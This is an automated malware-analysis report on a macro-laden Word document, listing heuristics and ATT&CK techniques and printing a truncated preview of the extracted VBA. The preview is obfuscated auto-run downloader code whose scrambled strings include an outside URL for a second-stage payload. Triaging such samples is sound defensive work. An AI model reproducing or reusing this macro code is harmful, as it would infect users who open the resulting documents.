MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro uses CreateObject and CallByName, indicating it's designed to run code. The presence of a macro-enable lure further supports its malicious intent. The VBA code is heavily obfuscated, but its structure suggests it's a downloader for a second-stage payload.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14516 bytes |
SHA-256: b2900d0093472c10bbf2806b9689a9e85b40dbe0b3840e1975734c8521a721fb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function oTrJRUiGzbmAjp(ByVal fMMlxLyA As String, ByVal korOJjXYfruaWu As String) As Integer
dITUKjnybi
cWKjkN = 6891
tzYfvhfWr 4165
fYiYXZWnaF 7578, "kPk7"
If qVIraQOSQdg Then
rkELOtduOlbLaN "WEVbs", True, "mQ"
SCMKJuiPEnJr "2Q", True
ymwyGPOHGlKHLU
Else
IflLUgUwxSdDTU 1146
End If
oTrJRUiGzbmAjp = 5291
End Function
Private Sub UOQng(ByVal ixDAVcPdsJ As String, ByVal idIXNzbajJyE As Integer)
yLEvf "NoI2P", 5222, True
hpxHFuHiGmT
AfTxHKuXEqwUm 7063
End Sub
Private Function wtZrHgAcDXn() As String
If XbqMhYUUyd Then
EclMZv
Else
lIZnCuxOxGIFSV 2523
End If
wtZrHgAcDXn = "21Q"
End Function
Private Sub Document_Open()
Dim YaAVkXQN As String
EVZlyY = 5132
RHBhAAofFSwH.BvSglhMnlnaDVz
End Sub
Private Function DypxaDRbHpL(ByVal fkmpOF As Integer, ByVal hNqhRcHGxs As String) As Boolean
FeHUJPfv 564, 1218, ""
BagoctPHSm = 5855
sTuNZ 1901, ""
aEcTgHlnXA 7473
IXhFgAspjk 238, "", ""
DypxaDRbHpL = False
End Function
Attribute VB_Name = "RHBhAAofFSwH"
Private Sub XeLWAzcdzEAN()
Dim plDzVuWJrNYd As Integer
iYpwuTOXA = 7110
hbxlTIXG kuenhNKZHjWn.MrTyAqxxvIA, 1503, GXuXmAk
kuenhNKZHjWn.hAUGh kuenhNKZHjWn.MrTyAqxxvIA
End Sub
Public Sub BvSglhMnlnaDVz()
qYbKtXcljs = 4891
On Error GoTo aFeTncetDk
FhrMiqUNDTs.ZezwW
FhrMiqUNDTs.IdgdOJAsbh
XeLWAzcdzEAN
Exit Sub
aFeTncetDk:
End Sub
Private Sub hbxlTIXG(ByVal nDvPAqheCgvC As String, ByVal CvwmCirOSiA As Integer, ByVal mETWg As String)
Dim tlUqwnGHwArleW As Integer
Set LXRCrUQf = XUGkC.srlQFV("WQ", mETWg, "")
XUGkC.JCrtX LXRCrUQf, eBWgjQfjhIw.AVMNIazH("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
kuenhNKZHjWn.vWpHsSWsYmpA nDvPAqheCgvC, GEZrz.bELGJfAfCOgKR(LXRCrUQf, eBWgjQfjhIw.AVMNIazH("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function jJtlttobqgM(ByVal SlZHI As String, ByVal pgIDrJcMBrA As String) As Object
Dim zWqwTojhqvNL As String
Dim dKQGcfy As String
Set jJtlttobqgM = lRyXdK(CreateObject(pgIDrJcMBrA), False, False)
End Function
Private Function lRyXdK(ByVal hwNQsgHEEiDJeH As Object, ByVal iDUhqRdC As Boolean, ByVal zzZCye As Boolean) As Object
Set lRyXdK = hwNQsgHEEiDJeH
End Function
Private Function GXuXmAk() As String
GXuXmAk = eBWgjQfjhIw.AVMNIazH("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function
Attribute VB_Name = "eBWgjQfjhIw"
Public Function AVMNIazH(ByVal ZlRMAVh As String, ByVal yJNNSuq As String) As String
Dim PJLZiTNtCw As Boolean
For NdmaQKDd = nxJuDe To dqIVYvHE.MgQrTNETrE("xXY8", ZlRMAVh)
AVMNIazH = dqIVYvHE.zGDMD("tT0p", AVMNIazH, 8054, BYtINm(yJNNSuq, dqIVYvHE.BtDlHivpfi(NdmaQKDd, "XtPYK", ZlRMAVh)))
Next
End Function
Private Sub MgOiZe(ByVal vVQOUSNHs As Boolean)
yiSFKZgeSNGk = "GJ7f"
jxTlwzlDaIi 4633, "Ew"
aQTGZR "", "gvuDw", "ZyWtX"
KXOjJHap = False
hgEnDKr "Hw"
SJyURfjBRkaV 7882
sOsafGUVjsAoN = 779
ZIjxeZ
End Sub
Private Sub CQzyhkFCsow()
If UPpNAZTDIjPRSz Then
RHjZIHZieSSv
dWMnFigez = "vg"
End If
End Sub
Private Function BYtINm(ByVal tWQwF As String, ByVal uLQjIXFHlTZaXW As String) As String
Dim DiCBaVwB As Integer
Dim KOcchZShYiiG As String
If Not dqIVYvHE.hHXEirfQJGj(uLQjIXFHlTZaXW, "weA", tWQwF, 4638) Then
BYtINm = uLQjIXFHlTZaXW
End If
End Function
Private Function nxJuDe() As Integer
wZgPY = "UzY"
nxJuDe = 1
End Function
Attribute VB_Name = "XUGkC"
Private Function kOkUJKgYuaN() As String
sMvsvbZz
CHKprZUiSIEFM "zaGCZ", "4ljQ", 1389
ZqrydnaQhbsc
EYrqIZmkd 2198, 3506, 5073
OkdaTZlK
kOkUJKgYuaN = "pNAw"
End Function
Private Function MXSWw() As Integer
MXSWw = 400
End Function
Public Sub JCrtX(ByVal dfmziVayJSq As Object, ByVal bGgylGzHEoyO As String)
GEZrz.mxThoSOVnUMNZ dfmziVayJSq, eBWgjQfjhIw.AVMNIazH("iSe 7nid", "Zip3 7o")
If GEZrz.bELGJfAfCOgKR(dfmziVayJSq, USHsp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.